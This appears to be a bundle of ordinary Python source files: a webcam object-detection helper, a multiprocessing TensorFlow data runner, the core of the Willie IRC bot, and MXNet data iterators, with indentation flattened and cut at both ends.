img_width = new_image.shape[1]
# for each cluster
for i,c in enumerate(color_rank[::-1]):
# gets the weight of the cluster
weight = c[0]
# calculates the height and width of the bins
height = int(weight/float(tot_pixels) *img_height )
width = img_width/len(color_rank)
# calculates the position of the bin
x_pos = i*width
# defines a color so that if less than three channels have been used
# for clustering, the color has average saturation and luminosity value
color = np.array( [0,128,200], dtype=np.uint8)
# substitutes the known HSV components in the default color
for j in range(len(c[1:])):
color[j] = c[j+1]
# print color[j] , j
# draws the bin to the image
# print color[0], color[1]
new_image[ img_height-height:img_height, x_pos:x_pos+width] = [color[0], color[1], color[2]]
# returns the cluster representation
# print color_rank[0]
return new_image,int(color_rank[0][1]),int(color_rank[0][2]),int(color_rank[0][3])
# Show fps value on image.
def draw_fps_on_image(fps, image_np):
cv2.putText(image_np, fps, (20, 50),
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (77, 255, 9), 2)
# Actual detection .. generate scores and bounding boxes given an image
def detect_objects(image_np, detection_graph, sess):
# Definite input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores),np.squeeze(classes)
# Code to thread reading camera input.
# Source : Adrian Rosebrock
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def size(self):
# return size of the capture device
return self.stream.get(3), self.stream.get(4)
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
data_runner.py
|
import multiprocessing
class DataRunnerMP:
"""
A multi-processing data runner for tensorflow
"""
def __init__(self, task_func, task_generator, input_pls, capacity=100):
self._input_pls = input_pls
self._task_func = task_func
self._task_generator = task_generator
self.counter = 0
self.processes = []
self._queue_outputs = self._input_pls
self.capacity = capacity
def get_feed_batch(self):
if self.counter % 100 == 0:
print('qlen=%i' % self.data_queue.qsize())
self.counter += 1
feed = self.data_queue.get()
out_feed= {}
for k, v in feed.items():
out_feed[self._input_pls[k]] = v
return out_feed
def get_inputs(self):
return dict(self._queue_outputs)
def _worker_main(self, task_queue, data_queue):
"""
generate sample from task queue and put the sample
into a data queue in the form of tf feed_dict
"""
while True:
task = task_queue.get()
sample = self._task_func(task)
if sample is None:
continue
feed = {}
for key, pl in self._input_pls.items():
feed[key] = sample[key]
data_queue.put(feed)
def _manager_main(self, queue):
"""
put tasks into queue
"""
for task in self._task_generator():
queue.put(task)
def start_processes(self, sess, n_processes=1):
self.task_queue = multiprocessing.Queue(self.capacity)
self.data_queue = multiprocessing.Queue(self.capacity)
p = multiprocessing.Process(target=self._manager_main, args=(self.task_queue,))
p.daemon = True
p.start()
self.processes.append(p)
for n in range(n_processes):
p = multiprocessing.Process(target=self._worker_main, args=(self.task_queue,self.data_queue))
p.daemon = True
p.start()
self.processes.append(p)
|
bot.py
|
# coding=utf8
"""
bot.py - Willie IRC Bot
Copyright 2008, Sean B. Palmer, inamidst.com
Copyright 2012, Edward Powell, http://embolalia.net
Copyright © 2012, Elad Alfassa <[email protected]>
Licensed under the Eiffel Forum License 2.
http://willie.dftba.net/
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
import time
import imp
import os
import re
import sys
import socket
import threading
from datetime import datetime
from willie import tools
import willie.irc as irc
from willie.db import WillieDB
from willie.tools import (stderr, PriorityQueue, Identifier, released, get_command_regexp,
iteritems, itervalues)
from willie.trigger import Trigger
import willie.module as module
from willie.logger import get_logger
LOGGER = get_logger(__name__)
if sys.version_info.major >= 3:
unicode = str
basestring = str
py3 = True
else:
py3 = False
class Willie(irc.Bot):
NOLIMIT = module.NOLIMIT
def __init__(self, config):
irc.Bot.__init__(self, config.core)
self.config = config
"""The ``Config`` for the current Willie instance."""
self.doc = {}
"""
A dictionary of command names to their docstring and example, if
declared. The first item in a callable's commands list is used as the
key in version *3.2* onward. Prior to *3.2*, the name of the function
as declared in the source code was used.
"""
self.stats = {}
"""
A dictionary which maps a tuple of a function name and where it was
used to the nuber of times it was used there.
"""
self.times = {}
"""
A dictionary mapping lower-case'd nicks to dictionaries which map
funtion names to the time which they were last used by that nick.
"""
self.acivity = {}
self.server_capabilities = set()
"""A set containing the IRCv3 capabilities that the server supports.
For servers that do not support IRCv3, this will be an empty set."""
self.enabled_capabilities = set()
"""A set containing the IRCv3 capabilities that the bot has enabled."""
self._cap_reqs = dict()
"""A dictionary of capability requests
Maps the capability name to a list of tuples of the prefix ('-', '=',
or ''), the name of the requesting module, and the function to call if
the request is rejected."""
self.privileges = dict()
"""A dictionary of channels to their users and privilege levels
The value associated with each channel is a dictionary of Identifiers to a
bitwise integer value, determined by combining the appropriate constants
from `module`."""
self.db = WillieDB(config)
"""The bot's database."""
self.memory = tools.WillieMemory()
"""
A thread-safe dict for storage of runtime data to be shared between
modules. See `WillieMemory <#tools.Willie.WillieMemory>`_
"""
self.scheduler = Willie.JobScheduler(self)
self.scheduler.start()
#Set up block lists
#Default to empty
if not self.config.core.nick_blocks:
self.config.core.nick_blocks = []
if not self.config.core.nick_blocks:
self.config.core.host_blocks = []
#Add nicks blocked under old scheme, if present
if self.config.core.other_bots:
nicks = self.config.core.get_list('nick_blocks')
bots = self.config.core.get_list('other_bots')
nicks.extend(bots)
self.config.core.nick_blocks = nicks
self.config.core.other_bots = False
self.config.save()
self.setup()
class JobScheduler(threading.Thread):
"""Calls jobs assigned to it in steady intervals.
JobScheduler is a thread that keeps track of Jobs and calls them every
X seconds, where X is a property of the Job. It maintains jobs in a
priority queue, where the next job to be called is always the first
item.
Thread safety is maintained with a mutex that is released during long
operations, so methods add_job and clear_jobs can be safely called from
the main thread.
"""
min_reaction_time = 30.0 # seconds
"""How often should scheduler checks for changes in the job list."""
def __init__(self, bot):
"""Requires bot as argument for logging."""
threading.Thread.__init__(self)
self.bot = bot
self._jobs = PriorityQueue()
# While PriorityQueue it self is thread safe, this mutex is needed
# to stop old jobs being put into new queue after clearing the
# queue.
self._mutex = threading.Lock()
# self.cleared is used for more fine grained locking.
self._cleared = False
def add_job(self, job):
"""Add a Job to the current job queue."""
self._jobs.put(job)
def clear_jobs(self):
"""Clear current Job queue and start fresh."""
if self._jobs.empty():
# Guards against getting stuck waiting for self._mutex when
# thread is waiting for self._jobs to not be empty.
return
with self._mutex:
self._cleared = True
self._jobs = PriorityQueue()
def run(self):
"""Run forever."""
while True:
try:
self._do_next_job()
except Exception:
# Modules exceptions are caught earlier, so this is a bit
# more serious. Options are to either stop the main thread
# or continue this thread and hope that it won't happen
# again.
self.bot.error()
# Sleep a bit to guard against busy-looping and filling
# the log with useless error messages.
time.sleep(10.0) # seconds
def _do_next_job(self):
"""Wait until there is a job and do it."""
with self._mutex:
# Wait until the next job should be executed.
# This has to be a loop, because signals stop time.sleep().
while True:
job = self._jobs.peek()
difference = job.next_time - time.time()
duration = min(difference, self.min_reaction_time)
if duration <= 0:
break
with released(self._mutex):
time.sleep(duration)
self._cleared = False
job = self._jobs.get()
with released(self._mutex):
if job.func.thread:
t = threading.Thread(
target=self._call, args=(job.func,)
)
t.start()
else:
self._call(job.func)
job.next()
# If jobs were cleared during the call, don't put an old job
# into the new job queue.
if not self._cleared:
self._jobs.put(job)
def _call(self, func):
"""Wrapper for collecting errors from modules."""
# Willie.bot.call is way too specialized to be used instead.
try:
func(self.bot)
except Exception:
self.bot.error()
class Job(object):
"""Hold information about when a function should be called next.
Job is a simple structure that hold information about when a function
should be called next.
They can be put in a priority queue, in which case the Job that should
be executed next is returned.
Calling the method next modifies the Job object for the next time it
should be executed. Current time is used to decide when the job should
be executed next so it should only be called right after the function
was called.
"""
max_catchup = 5
"""
This governs how much the scheduling of jobs is allowed
to get behind before they are simply thrown out to avoid
calling the same function too many times at once.
"""
def __init__(self, interval, func):
"""Initialize Job.
Args:
interval: number of seconds between calls to func
func: function to be called
"""
self.next_time = time.time() + interval
self.interval = interval
self.func = func
def next(self):
"""Update self.next_time with the assumption func was just called.
Returns: A modified job object.
"""
last_time = self.next_time
current_time = time.time()
delta = last_time + self.interval - current_time
if last_time > current_time + self.interval:
# Clock appears to have moved backwards. Reset
# the timer to avoid waiting for the clock to
# catch up to whatever time it was previously.
self.next_time = current_time + self.interval
elif delta < 0 and abs(delta) > self.interval * self.max_catchup:
# Execution of jobs is too far behind. Give up on
# trying to catch up and reset the time, so that
# will only be repeated a maximum of
# self.max_catchup times.
self.next_time = current_time - \
self.interval * self.max_catchup
else:
self.next_time = last_time + self.interval
return self
def __cmp__(self, other):
"""Compare Job objects according to attribute next_time."""
return self.next_time - other.next_time
if py3:
def __lt__(self, other):
return self.next_time < other.next_time
def __gt__(self, other):
return self.next_time > other.next_time
def __str__(self):
"""Return a string representation of the Job object.
Example result:
<Job(2013-06-14 11:01:36.884000, 20s, <function upper at 0x02386BF0>)>
"""
iso_time = str(datetime.fromtimestamp(self.next_time))
return "<Job(%s, %ss, %s)>" % \
(iso_time, self.interval, self.func)
def __iter__(self):
"""This is an iterator. Never stops though."""
return self
def setup(self):
stderr("\nWelcome to Willie. Loading modules...\n\n")
self.callables = set()
self.shutdown_methods = set()
filenames = self.config.enumerate_modules()
# Coretasks is special. No custom user coretasks.
this_dir = os.path.dirname(os.path.abspath(__file__))
filenames['coretasks'] = os.path.join(this_dir, 'coretasks.py')
modules = []
error_count = 0
for name, filename in iteritems(filenames):
try:
module = imp.load_source(name, filename)
except Exception as e:
error_count = error_count + 1
filename, lineno = tools.get_raising_file_and_line()
rel_path = os.path.relpath(filename, os.path.dirname(__file__))
raising_stmt = "%s:%d" % (rel_path, lineno)
stderr("Error loading %s: %s (%s)" % (name, e, raising_stmt))
else:
try:
if hasattr(module, 'setup'):
module.setup(self)
self.register(vars(module))
modules.append(name)
except Exception as e:
error_count = error_count + 1
filename, lineno = tools.get_raising_file_and_line()
rel_path = os.path.relpath(
filename, os.path.dirname(__file__)
)
raising_stmt = "%s:%d" % (rel_path, lineno)
stderr("Error in %s setup procedure: %s (%s)"
% (name, e, raising_stmt))
if modules:
stderr('\n\nRegistered %d modules,' % (len(modules) - 1))
stderr('%d modules failed to load\n\n' % error_count)
else:
stderr("Warning: Couldn't find any modules")
self.bind_commands()
@staticmethod
def is_callable(obj):
"""Return true if object is a willie callable.
Object must be both be callable and have hashable. Furthermore, it must
have either "commands", "rule" or "interval" as attributes to mark it
as a willie callable.
"""
if not callable(obj):
# Check is to help distinguish between willie callables and objects
# which just happen to have parameter commands or rule.
return False
if (hasattr(obj, 'commands') or
hasattr(obj, 'rule') or
hasattr(obj, 'interval')):
return True
return False
@staticmethod
def is_shutdown(obj):
"""Return true if object is a willie shutdown method.
Object must be both be callable and named shutdown.
"""
if (callable(obj) and
hasattr(obj, "__name__")
and obj.__name__ == 'shutdown'):
return True
return False
def register(self, variables):
"""Register all willie callables.
With the ``__dict__`` attribute from a Willie module, update or add the
trigger commands and rules, to allow the function to be triggered, and
shutdown methods, to allow the modules to be notified when willie is
quitting.
"""
for obj in itervalues(variables):
if self.is_callable(obj):
self.callables.add(obj)
if self.is_shutdown(obj):
self.shutdown_methods.add(obj)
def unregister(self, variables):
"""Unregister all willie callables in variables, and their bindings.
When unloading a module, this ensures that the unloaded modules will
not get called and that the objects can be garbage collected. Objects
that have not been registered are ignored.
Args:
variables -- A list of callable objects from a willie module.
"""
def remove_func(func, commands):
"""Remove all traces of func from commands."""
for func_list in itervalues(commands):
if func in func_list:
func_list.remove(func)
for obj in itervalues(variables):
if obj in self.callables:
self.callables.remove(obj)
for commands in itervalues(self.commands):
remove_func(obj, commands)
if obj in self.shutdown_methods:
try:
obj(self)
except Exception as e:
stderr(
"Error calling shutdown method for module %s:%s" %
(obj.__module__, e)
)
self.shutdown_methods.remove(obj)
def sub(self, pattern):
"""Replace any of the following special directives in a function's rule expression:
$nickname -> the bot's nick
$nick -> the bot's nick followed by : or ,
"""
nick = re.escape(self.nick)
# These replacements have significant order
subs = [('$nickname', r'{0}'.format(nick)),
('$nick', r'{0}[,:]\s+'.format(nick)),
]
for directive, subpattern in subs:
pattern = pattern.replace(directive, subpattern)
return pattern
def bind_commands(self):
self.commands = {'high': {}, 'medium': {}, 'low': {}}
self.scheduler.clear_jobs()
def bind(priority, regexp, func):
# Function name is no longer used for anything, as far as I know,
# but we're going to keep it around anyway.
if not hasattr(func, 'name'):
func.name = func.__name__
def trim_docstring(doc):
"""Clean up a docstring"""
if not doc:
return []
lines = doc.expandtabs().splitlines()
indent = sys.maxsize
for line in lines[1:]:
stripped = line.lstrip()
if stripped:
indent = min(indent, len(line) - len(stripped))
trimmed = [lines[0].strip()]
if indent < sys.maxsize:
for line in lines[1:]:
trimmed.append(line[indent:].rstrip())
while trimmed and not trimmed[-1]:
trimmed.pop()
while trimmed and not trimmed[0]:
trimmed.pop(0)
return trimmed
doc = trim_docstring(func.__doc__)
if hasattr(func, 'commands') and func.commands[0]:
example = None
if hasattr(func, 'example'):
if isinstance(func.example, basestring):
# Support old modules that add the attribute directly.
example = func.example
else:
# The new format is a list of dicts.
example = func.example[0]["example"]
example = example.replace('$nickname', str(self.nick))
help_prefix = (self.config.core.help_prefix
or self.config.core.prefix.strip('\\'))
if example[0] != help_prefix:
example = help_prefix + example[len(help_prefix):]
if doc or example:
for command in func.commands:
self.doc[command] = (doc, example)
self.commands[priority].setdefault(regexp, []).append(func)
for func in self.callables:
if not hasattr(func, 'unblockable'):
func.unblockable = False
if not hasattr(func, 'priority'):
func.priority = 'medium'
if not hasattr(func, 'thread'):
func.thread = True
if not hasattr(func, 'event'):
func.event = ['PRIVMSG']
else:
if type(func.event) is not list:
func.event = [func.event.upper()]
else:
func.event = [event.upper() for event in func.event]
if not hasattr(func, 'rate'):
func.rate = 0
if hasattr(func, 'rule'):
rules = func.rule
if isinstance(rules, basestring):
rules = [func.rule]
if isinstance(rules, list):
for rule in rules:
pattern = self.sub(rule)
flags = re.IGNORECASE
if rule.find("\n") != -1:
flags |= re.VERBOSE
regexp = re.compile(pattern, flags)
bind(func.priority, regexp, func)
elif isinstance(func.rule, tuple):
# 1) e.g. ('$nick', '(.*)')
if len(func.rule) == 2 and isinstance(func.rule[0], str):
prefix, pattern = func.rule
prefix = self.sub(prefix)
regexp = re.compile(prefix + pattern, re.I)
bind(func.priority, regexp, func)
# 2) e.g. (['p', 'q'], '(.*)')
elif len(func.rule) == 2 and \
isinstance(func.rule[0], list):
prefix = self.config.core.prefix
commands, pattern = func.rule
for command in commands:
command = r'(%s)\b(?: +(?:%s))?' % (
command, pattern
)
regexp = re.compile(prefix + command, re.I)
bind(func.priority, regexp, func)
# 3) e.g. ('$nick', ['p', 'q'], '(.*)')
elif len(func.rule) == 3:
prefix, commands, pattern = func.rule
prefix = self.sub(prefix)
for command in commands:
command = r'(%s) +' % command
regexp = re.compile(
prefix + command + pattern, re.I
)
bind(func.priority, regexp, func)
if hasattr(func, 'commands'):
for command in func.commands:
prefix = self.config.core.prefix
regexp = get_command_regexp(prefix, command)
bind(func.priority, regexp, func)
if hasattr(func, 'interval'):
for interval in func.interval:
job = Willie.Job(interval, func)
self.scheduler.add_job(job)
class WillieWrapper(object):
def __init__(self, willie, trigger):
# The custom __setattr__ for this class sets the attribute on the
# original bot object. We don't want that for these, so we set them
# with the normal __setattr__.
object.__setattr__(self, '_bot', willie)
object.__setattr__(self, '_trigger', trigger)
def __dir__(self):
classattrs = [attr for attr in self.__class__.__dict__
if not attr.startswith('__')]
return list(self.__dict__) + classattrs + dir(self._bot)
def say(self, string, max_messages=1):
self._bot.msg(self._trigger.sender, string, max_messages)
def reply(self, string, notice=False):
if isinstance(string, str) and not py3:
string = string.decode('utf8')
if notice:
self.notice(
'%s: %s' % (self._trigger.nick, string),
self._trigger.sender
)
else:
self._bot.msg(
self._trigger.sender,
'%s: %s' % (self._trigger.nick, string)
)
def action(self, string, recipient=None):
if recipient is None:
recipient = self._trigger.sender
self._bot.msg(recipient, '\001ACTION %s\001' % string)
def notice(self, string, recipient=None):
if recipient is None:
recipient = self._trigger.sender
self.write(('NOTICE', recipient), string)
def __getattr__(self, attr):
return getattr(self._bot, attr)
def __setattr__(self, attr, value):
return setattr(self._bot, attr, value)
def call(self, func, willie, trigger):
nick = trigger.nick
if nick not in self.times:
self.times[nick] = dict()
if not trigger.admin and \
not func.unblockable and \
func.rate > 0 and \
func in self.times[nick]:
timediff = time.time() - self.times[nick][func]
if timediff < func.rate:
self.times[nick][func] = time.time()
LOGGER.info(
"%s prevented from using %s in %s: %d < %d",
trigger.nick, func.__name__, trigger.sender, timediff,
func.rate
)
return
try:
exit_code = func(willie, trigger)
except Exception:
exit_code = None
self.error(trigger)
if exit_code != module.NOLIMIT:
self.times[nick][func] = time.time()
def limit(self, trigger, func):
if trigger.sender and not trigger.sender.is_nick():
if self.config.has_section('limit'):
limits = self.config.limit.get(trigger.sender)
if limits and (func.__module__ not in limits):
return True
return False
def dispatch(self, pretrigger):
args = pretrigger.args
event, args, text = pretrigger.event, args, args[-1]
if self.config.core.nick_blocks or self.config.core.host_blocks:
nick_blocked = self._nick_blocked(pretrigger.nick)
host_blocked = self._host_blocked(pretrigger.host)
else:
nick_blocked = host_blocked = None
list_of_blocked_functions = []
for priority in ('high', 'medium', 'low'):
items = self.commands[priority].items()
for regexp, funcs in items:
match = regexp.match(text)
if not match:
continue
trigger = Trigger(self.config, pretrigger, match)
wrapper = self.WillieWrapper(self, trigger)
for func in funcs:
if (not trigger.admin and
not func.unblockable and
(nick_blocked or host_blocked)):
function_name = "%s.%s" % (
func.__module__, func.__name__
)
list_of_blocked_functions.append(function_name)
continue
if event not in func.event:
continue
if self.limit(trigger, func):
continue
if func.thread:
targs = (func, wrapper, trigger)
t = threading.Thread(target=self.call, args=targs)
t.start()
else:
self.call(func, wrapper, trigger)
if list_of_blocked_functions:
if nick_blocked and host_blocked:
block_type = 'both'
elif nick_blocked:
block_type = 'nick'
else:
block_type = 'host'
LOGGER.info(
"[%s]%s prevented from using %s.",
block_type,
trigger.nick,
', '.join(list_of_blocked_functions)
)
def _host_blocked(self, host):
bad_masks = self.config.core.get_list('host_blocks')
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
def _nick_blocked(self, nick):
bad_nicks = self.config.core.get_list('nick_blocks')
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
stderr(
'Calling shutdown for %d modules.' % (len(self.shutdown_methods),)
)
for shutdown_method in self.shutdown_methods:
try:
stderr(
"calling %s.%s" % (
shutdown_method.__module__, shutdown_method.__name__,
)
)
shutdown_method(self)
except Exception as e:
stderr(
"Error calling shutdown method for module %s:%s" % (
shutdown_method.__module__, e
)
)
def cap_req(self, module_name, capability, failure_callback):
"""Tell Willie to request a capability when it starts.
By prefixing the capability with `-`, it will be ensured that the
capability is not enabled. Simmilarly, by prefixing the capability with
`=`, it will be ensured that the capability is enabled. Requiring and
disabling is "first come, first served"; if one module requires a
capability, and another prohibits it, this function will raise an
exception in whichever module loads second. An exception will also be
raised if the module is being loaded after the bot has already started,
and the request would change the set of enabled capabilities.
If the capability is not prefixed, and no other module prohibits it, it
will be requested. Otherwise, it will not be requested. Since
capability requests that are not mandatory may be rejected by the
server, as well as by other modules, a module which makes such a
request should account for that possibility.
The actual capability request to the server is handled after the
completion of this function. In the event that the server denies a
request, the `failure_callback` function will be called, if provided.
The arguments will be a `Willie` object, and the capability which was
rejected. This can be used to disable callables which rely on the
capability.
"""
#TODO raise better exceptions
cap = capability[1:]
prefix = capability[0]
if prefix == '-':
if self.connection_registered and cap in self.enabled_capabilities:
raise Exception('Can not change capabilities after server '
'connection has been completed.')
entry = self._cap_reqs.get(cap, [])
if any((ent[0] != '-' for ent in entry)):
raise Exception('Capability conflict')
entry.append((prefix, module_name, failure_callback))
self._cap_reqs[cap] = entry
else:
if prefix != '=':
cap = capability
prefix = ''
if self.connection_registered and (cap not in
self.enabled_capabilities):
raise Exception('Can not change capabilities after server '
'connection has been completed.')
entry = self._cap_reqs.get(cap, [])
# Non-mandatory will callback at the same time as if the server
# rejected it.
if any((ent[0] == '-' for ent in entry)) and prefix == '=':
raise Exception('Capability conflict')
entry.append((prefix, module_name, failure_callback))
self._cap_reqs[cap] = entry
|
io.py
|
"""Data iterators for common data formats."""
from __future__ import absolute_import
from collections import OrderedDict, namedtuple
import sys
import ctypes
import logging
import threading
import numpy as np
from .base import _LIB
from .base import c_array, c_str, mx_uint, py_str
from .base import DataIterHandle, NDArrayHandle
from .base import mx_real_t
from .base import check_call, build_param_doc as _build_param_doc
from .ndarray import NDArray
from .ndarray import array
from .ndarray import concatenate
class DataDesc(namedtuple('DataDesc', ['name', 'shape'])):
"""Data description
Parameters
----------
cls : DataDesc
The class.
name : str
Data name.
shape : tuple of int
Data shape.
dtype : np.dtype, optional
Data type.
layout : str, optional
Data layout.
"""
def __new__(cls, name, shape, dtype=mx_real_t, layout='NCHW'):
ret = super(cls, DataDesc).__new__(cls, name, shape)
ret.dtype = dtype
ret.layout = layout
return ret
def __repr__(self):
return "DataDesc[%s,%s,%s,%s]" % (self.name, self.shape, self.dtype,
self.layout)
@staticmethod
def get_batch_axis(layout):
"""Get the dimension that corresponds to the batch size.
When data parallelism is used, the data will be automatically split and
concatenated along the batch-size dimension. Axis can be -1, which means
the whole array will be copied for each data-parallelism device.
Parameters
----------
layout : str
layout string. For example, "NCHW".
Returns
-------
int
An axis indicating the batch_size dimension.
"""
if layout is None:
return 0
return layout.find('N')
@staticmethod
def get_list(shapes, types):
"""Get DataDesc list from attribute lists.
Parameters
----------
shapes : a tuple of (name, shape)
types : a tuple of (name, type)
"""
if types is not None:
type_dict = dict(types)
return [DataDesc(x[0], x[1], type_dict[x[0]]) for x in shapes]
else:
return [DataDesc(x[0], x[1]) for x in shapes]
class DataBatch(object):
"""A data batch.
Parameters
----------
data : list of NDArray
A list of input data.
label : list of NDArray, optional
A list of input labels.
pad : int, optional
The number of examples padded at the batch end. It is used when the
examples read is less than the batch size.
index : numpy.array, optional
The example indices in this batch.
bucket_key : int, optional
The key of the bucket, used for bucket IO.
provide_data : list of (name, shape), optional
The *i*-th elements describes the name and shape of ``data[i]``.
If not provided, the order of arg_names of the executor is assumed.
When working with Module this is the order of the data_names argument.
provide_label : list of (name, shape), optional
The *i*-th elements describes the name and shape of ``label[i]``.
If not provided, the order of arg_names of the executor is assumed.
When working with Module this is the order of the label_names argument.
"""
def __init__(self, data, label=None, pad=None, index=None,
bucket_key=None, provide_data=None, provide_label=None):
if data is not None:
assert isinstance(data, (list, tuple)), "Data must be list of NDArrays"
if label is not None:
assert isinstance(label, (list, tuple)), "Label must be list of NDArrays"
self.data = data
self.label = label
self.pad = pad
self.index = index
self.bucket_key = bucket_key
self.provide_data = provide_data
self.provide_label = provide_label
def __str__(self):
data_shapes = [d.shape for d in self.data]
label_shapes = [l.shape for l in self.label]
return "{}: data shapes: {} label shapes: {}".format(
self.__class__.__name__,
data_shapes,
label_shapes)
class DataIter(object):
"""The base class of a data iterator.
Parameters
----------
batch_size : int, optional
The batch size, namely the number of examples in a batch.
"""
def __init__(self, batch_size=0):
self.batch_size = batch_size
def __iter__(self):
return self
def reset(self):
"""Reset the iterator to the begin of the data."""
pass
def next(self):
"""Get next data batch from iterator.
Returns
-------
DataBatch
The data of next batch.
Raises
------
StopIteration
If the end of the data is reached.
"""
if self.iter_next():
return DataBatch(data=self.getdata(), label=self.getlabel(), \
pad=self.getpad(), index=self.getindex())
else:
raise StopIteration
def __next__(self):
return self.next()
def iter_next(self):
"""Move to the next batch.
Returns
-------
boolean
Whether the move is successful.
"""
pass
def getdata(self):
"""Get data of current batch.
Returns
-------
list of NDArray
The data of the current batch.
"""
pass
def getlabel(self):
"""Get label of the current batch.
Returns
-------
list of NDArray
The label of the current batch.
"""
pass
def getindex(self):
"""Get index of the current batch.
Returns
-------
index : numpy.array
The indices of examples in the current batch.
"""
return None
def getpad(self):
"""Get the number of padding examples in the current batch.
Returns
-------
int
Number of padding examples in the current batch.
"""
pass
class ResizeIter(DataIter):
"""Resize a data iterator to a given number of batches.
Parameters
----------
data_iter : DataIter
The data iterator to be resized.
size : int
The number of batches per epoch to resize to.
reset_internal : bool
Whether to reset internal iterator on ResizeIter.reset.
Examples
--------
>>> nd_iter = mx.io.NDArrayIter(mx.nd.ones((100,10)), batch_size=25)
>>> resize_iter = mx.io.ResizeIter(nd_iter, 2)
>>> for batch in resize_iter:
... print(batch.data)
[<NDArray 25x10 @cpu(0)>]
[<NDArray 25x10 @cpu(0)>]
"""
def __init__(self, data_iter, size, reset_internal=True):
super(ResizeIter, self).__init__()
self.data_iter = data_iter
self.size = size
self.reset_internal = reset_internal
self.cur = 0
self.current_batch = None
self.provide_data = data_iter.provide_data
self.provide_label = data_iter.provide_label
self.batch_size = data_iter.batch_size
if hasattr(data_iter, 'default_bucket_key'):
self.default_bucket_key = data_iter.default_bucket_key
def reset(self):
self.cur = 0
if self.reset_internal:
self.data_iter.reset()
def iter_next(self):
if self.cur == self.size:
return False
try:
self.current_batch = self.data_iter.next()
except StopIteration:
self.data_iter.reset()
self.current_batch = self.data_iter.next()
self.cur += 1
return True
def getdata(self):
return self.current_batch.data
def getlabel(self):
return self.current_batch.label
def getindex(self):
return self.current_batch.index
def getpad(self):
return self.current_batch.pad
class PrefetchingIter(DataIter):
"""Performs pre-fetch for other data iterators.
This iterator will create another thread to perform ``iter_next`` and then
store the data in memory. It potentially accelerates the data read, at the
cost of more memory usage.
Parameters
----------
iters : DataIter or list of DataIter
The data iterators to be pre-fetched.
rename_data : None or list of dict
The *i*-th element is a renaming map for the *i*-th iter, in the form of
{'original_name' : 'new_name'}. Should have one entry for each entry
in iter[i].provide_data.
rename_label : None or list of dict
Similar to ``rename_data``.
Examples
--------
>>> iter1 = mx.io.NDArrayIter({'data':mx.nd.ones((100,10))}, batch_size=25)
>>> iter2 = mx.io.NDArrayIter({'data':mx.nd.ones((100,10))}, batch_size=25)
>>> piter = mx.io.PrefetchingIter([iter1, iter2],
... rename_data=[{'data': 'data_1'}, {'data': 'data_2'}])
>>> print(piter.provide_data)
[DataDesc[data_1,(25, 10L),<type 'numpy.float32'>,NCHW],
DataDesc[data_2,(25, 10L),<type 'numpy.float32'>,NCHW]]
"""
def __init__(self, iters, rename_data=None, rename_label=None):
super(PrefetchingIter, self).__init__()
if not isinstance(iters, list):
iters = [iters]
self.n_iter = len(iters)
assert self.n_iter > 0
self.iters = iters
self.rename_data = rename_data
self.rename_label = rename_label
self.batch_size = self.provide_data[0][1][0]
self.data_ready = [threading.Event() for i in range(self.n_iter)]
self.data_taken = [threading.Event() for i in range(self.n_iter)]
for i in self.data_taken:
i.set()
self.started = True
self.current_batch = [None for i in range(self.n_iter)]
self.next_batch = [None for i in range(self.n_iter)]
def prefetch_func(self, i):
"""Thread entry"""
while True:
self.data_taken[i].wait()
if not self.started:
break
try:
self.next_batch[i] = self.iters[i].next()
except StopIteration:
self.next_batch[i] = None
self.data_taken[i].clear()
self.data_ready[i].set()
self.prefetch_threads = [threading.Thread(target=prefetch_func, args=[self, i]) \
for i in range(self.n_iter)]
for thread in self.prefetch_threads:
thread.setDaemon(True)
thread.start()
def __del__(self):
self.started = False
for i in self.data_taken:
i.set()
for thread in self.prefetch_threads:
thread.join()
@property
def provide_data(self):
if self.rename_data is None:
return sum([i.provide_data for i in self.iters], [])
else:
return sum([[
DataDesc(r[x.name], x.shape, x.dtype)
if isinstance(x, DataDesc) else DataDesc(*x)
for x in i.provide_data
] for r, i in zip(self.rename_data, self.iters)], [])
@property
def provide_label(self):
if self.rename_label is None:
return sum([i.provide_label for i in self.iters], [])
else:
return sum([[
DataDesc(r[x.name], x.shape, x.dtype)
if isinstance(x, DataDesc) else DataDesc(*x)
for x in i.provide_label
] for r, i in zip(self.rename_label, self.iters)], [])
def reset(self):
for i in self.data_ready:
i.wait()
for i in self.iters:
i.reset()
for i in self.data_ready:
i.clear()
for i in self.data_taken:
i.set()
def iter_next(self):
for i in self.data_ready:
i.wait()
if self.next_batch[0] is None:
for i in self.next_batch:
assert i is None, "Number of entry mismatches between iterators"
return False
else:
for batch in self.next_batch:
assert batch.pad == self.next_batch[0].pad, \
"Number of entry mismatches between iterators"
self.current_batch = DataBatch(sum([batch.data for batch in self.next_batch], []),
sum([batch.label for batch in self.next_batch], []),
